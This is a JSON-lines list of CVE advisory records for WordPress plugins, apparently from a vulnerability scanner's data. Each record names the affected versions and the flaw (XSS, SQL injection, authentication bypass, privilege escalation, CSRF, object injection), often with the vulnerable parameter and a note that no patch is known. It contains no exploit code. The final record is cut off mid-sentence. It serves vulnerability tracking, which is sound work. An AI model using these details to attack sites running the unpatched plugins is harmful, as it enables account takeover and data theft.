{"CVE_ID":"CVE-2023-41661","slug":"smarty-for-wordpress","versionImpact":"3.1.35","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in PressPage Entertainment Inc. Smarty for WordPress plugin <=\u00a03.1.35 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/smarty-for-wordpress\\\/wordpress-smarty-for-wordpress-plugin-3-1-35-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/smarty-for-wordpress\\\/wordpress-smarty-for-wordpress-plugin-3-1-35-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0680","slug":"wp-private-content-plus","versionImpact":"3.6","description":"The WP Private Content Plus plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 3.6. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-private-content-plus\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-private-content-plus\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1203","slug":"enhanced-e-commerce-for-woocommerce-store","versionImpact":"6.9.1","description":"The Conversios \u2013 Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'valueData' parameter in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb7d499-28ba-48ef-9798-b7c8cbb7aa3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb7d499-28ba-48ef-9798-b7c8cbb7aa3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/trunk\\\/includes\\\/data\\\/class-tvc-ajax-file.php#L1850\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/trunk\\\/includes\\\/data\\\/class-tvc-ajax-file.php#L1850\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3658","slug":"build-app-online","versionImpact":"1.0.21","description":"The Build App Online plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.21. This is due to missing authentication checking in the 'set_user_cart' function with the 'user_id' header value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d423ad-da51-4616-860d-2b9354d44147?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d423ad-da51-4616-860d-2b9354d44147?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L814\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L814\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5001","slug":"image-hover-effects-with-carousel","versionImpact":"3.0.2","description":"The Image Hover Effects for Elementor with Lightbox and Flipbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_id', 'oxi_addons_f_title_tag', and 'content_description_tag' parameters in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c384f05-96dd-47bb-822d-16212527091a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c384f05-96dd-47bb-822d-16212527091a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Image\\\/Data.php#L2838\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Image\\\/Data.php#L2838\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Flipbox\\\/Flipbox.php#L3211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Flipbox\\\/Flipbox.php#L3211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Caption\\\/Caption.php#L2622\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Caption\\\/Caption.php#L2622\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7355","slug":"organization-chart","versionImpact":"1.5.0","description":"The Organization chart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title_input\u2019 and 'node_description' parameter in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure charts can be extended to subscribers.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04641506-5b0e-48bc-ad50-c81dda996ecf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04641506-5b0e-48bc-ad50-c81dda996ecf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/organization-chart\\\/trunk\\\/admin\\\/assets\\\/js\\\/tree_page.js#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/organization-chart\\\/trunk\\\/admin\\\/assets\\\/js\\\/tree_page.js#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/organization-chart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/organization-chart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/organization-chart\\\/trunk\\\/admin\\\/assets\\\/js\\\/tree_page.js#L217\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/organization-chart\\\/trunk\\\/admin\\\/assets\\\/js\\\/tree_page.js#L217\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131569\\\/#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131569\\\/#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6928","slug":"opti-marketing","versionImpact":"2.0.9","description":"The Opti Marketing WordPress plugin through 2.0.9 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7bb9474f-2b9d-4856-b36d-a43da3db0245\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7bb9474f-2b9d-4856-b36d-a43da3db0245\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8718","slug":"gravity-forms-toolbar","versionImpact":"1.7.0","description":"The Gravity Forms Toolbar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d1c6daf-1799-4f8a-81e3-ef3968f41b8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d1c6daf-1799-4f8a-81e3-ef3968f41b8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-toolbar\\\/tags\\\/1.7.0\\\/admin\\\/form.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-toolbar\\\/tags\\\/1.7.0\\\/admin\\\/form.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-toolbar\\\/tags\\\/1.7.0\\\/admin\\\/form.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-toolbar\\\/tags\\\/1.7.0\\\/admin\\\/form.php#L44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9848","slug":"product-customizer-light","versionImpact":"1.0.0","description":"The Product Customizer Light plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d1feee-347c-4f43-a01b-67b3d0a5b2d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d1feee-347c-4f43-a01b-67b3d0a5b2d6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-customizer-light\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-customizer-light\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10958","slug":"wp-photo-album-plus","versionImpact":"8.8.08.007","description":"The The WP Photo Album Plus plugin for WordPress is vulnerable to arbitrary shortcode execution via getshortcodedrenderedfenodelay AJAX action in all versions up to, and including, 8.8.08.007 . This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53bb0871-343a-4299-9902-682c422152d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53bb0871-343a-4299-9902-682c422152d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-album-plus\\\/tags\\\/8.8.08.004\\\/wppa-ajax.php#L1238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-album-plus\\\/tags\\\/8.8.08.004\\\/wppa-ajax.php#L1238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photo-album-plus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photo-album-plus\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184852\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184852\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12004","slug":"woo-order-notes","versionImpact":"1.5.2","description":"The WPC Order Notes for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.2. This is due to missing or incorrect nonce validation on the ajax_update_order_note() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-notes\\\/trunk\\\/wpc-order-notes.php#L416\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-notes\\\/trunk\\\/wpc-order-notes.php#L416\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205072\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205072\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-order-notes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-order-notes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05f40082-30ed-45f7-81d5-d5334a51fcea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05f40082-30ed-45f7-81d5-d5334a51fcea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13538","slug":"bigbuy-wc-dropshipping-connector","versionImpact":"1.9.19","description":"The BigBuy Dropshipping Connector for WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.9.19. This is due the \/vendor\/cocur\/slugify\/bin\/generate-default.php file being directly accessible and triggering an error. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bigbuy-wc-dropshipping-connector\\\/trunk\\\/vendor\\\/cocur\\\/slugify\\\/bin\\\/generate-default.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bigbuy-wc-dropshipping-connector\\\/trunk\\\/vendor\\\/cocur\\\/slugify\\\/bin\\\/generate-default.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15f38b3e-69fe-436f-ba4b-7985ec9dac00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15f38b3e-69fe-436f-ba4b-7985ec9dac00?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4579","slug":"wp-content-security-policy","versionImpact":"2.3","description":"The WP Content Security Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blocked-uri and effective-directive  parameters in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L597\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L597\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L612\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L612\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3c4ba08-a9fa-439a-a887-b8c113f78e20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3c4ba08-a9fa-439a-a887-b8c113f78e20?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4334","slug":"wp-registration","versionImpact":"6.3","description":"The Simple User Registration plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.3. This is due to insufficient restrictions on user meta values that can be supplied during registration. This makes it possible for unauthenticated attackers to register as an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-registration\\\/trunk\\\/inc\\\/classes\\\/class.register.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-registration\\\/trunk\\\/inc\\\/classes\\\/class.register.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c211e0c0-3086-43d2-853c-489f9c42b0ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c211e0c0-3086-43d2-853c-489f9c42b0ab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6539","slug":"voltax-video-player","versionImpact":"1.6.5","description":"The Voltax Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/voltax-video-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/voltax-video-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/babc2e50-27a5-413b-8611-0e9e9db33deb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/babc2e50-27a5-413b-8611-0e9e9db33deb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28667","slug":"lead-generated","versionImpact":"1.23","description":"The Lead Generated WordPress Plugin, version <= 1.23, was affected by an unauthenticated insecure deserialization issue. The tve_labels parameter of the tve_api_form_submit action is passed to the PHP unserialize() function without being sanitized or verified, and as a result could lead to PHP object injection, which when combined with certain class implementations \/ gadget chains could be leveraged to perform a variety of malicious actions granted a POP chain is also present.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-7\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2276","slug":"wc-multivendor-membership","versionImpact":"2.10.7","description":"The WCFM Membership \u2013 WooCommerce Memberships for Multivendor Marketplace plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 2.10.7. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907455\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907455\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42222c64-6492-4774-b5bc-8e62a1a328cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42222c64-6492-4774-b5bc-8e62a1a328cf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-membership\\\/tags\\\/2.10.7\\\/controllers\\\/wcfmvm-controller-memberships-registration.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-membership\\\/tags\\\/2.10.7\\\/controllers\\\/wcfmvm-controller-memberships-registration.php#L124\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3080","slug":"wp-mail-catcher","versionImpact":"2.1.2","description":"The WP Mail Catcher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924014\\\/wp-mail-catcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924014\\\/wp-mail-catcher\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1525e1c9-4b94-4f9f-92c5-fc69fe000771?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1525e1c9-4b94-4f9f-92c5-fc69fe000771?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5295","slug":"facebook-comment-by-vivacity","versionImpact":"1.4","description":"The Blog Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'vivafbcomment' shortcode in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-comment-by-vivacity\\\/tags\\\/1.4\\\/user-file.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-comment-by-vivacity\\\/tags\\\/1.4\\\/user-file.php#L172\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602b3b9c-76a7-4b0b-8aad-e554c2fd6910?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602b3b9c-76a7-4b0b-8aad-e554c2fd6910?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0433","slug":"wppdf","versionImpact":"20221130","description":"The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_unset_default_card' function. This makes it possible for unauthenticated attackers to remove the default status of a card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wppdf\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wppdf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1176","slug":"ht-easy-google-analytics","versionImpact":"1.1.5","description":"The HT Easy GA4 \u2013 Google Analytics WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the login() function in all versions up to, and including, 1.1.5. This makes it possible for unauthenticated attackers to update the email associated through the plugin with GA4.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10e1b3ac-f002-4108-9682-5fe300f07adb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10e1b3ac-f002-4108-9682-5fe300f07adb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-easy-google-analytics\\\/trunk\\\/includes\\\/class.ht-easy-ga4.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-easy-google-analytics\\\/trunk\\\/includes\\\/class.ht-easy-ga4.php#L99\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4942","slug":"custom-dash","versionImpact":"1.0.2","description":"The Custom Dash plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13344366-feb0-4987-9543-222e3d35dab3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13344366-feb0-4987-9543-222e3d35dab3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-dash\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-dash\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7353","slug":"stripe-payments","versionImpact":"2.0.86","description":"The Accept Stripe Payments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's accept_stripe_payment_ng shortcode in all versions up to, and including, 2.0.86 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 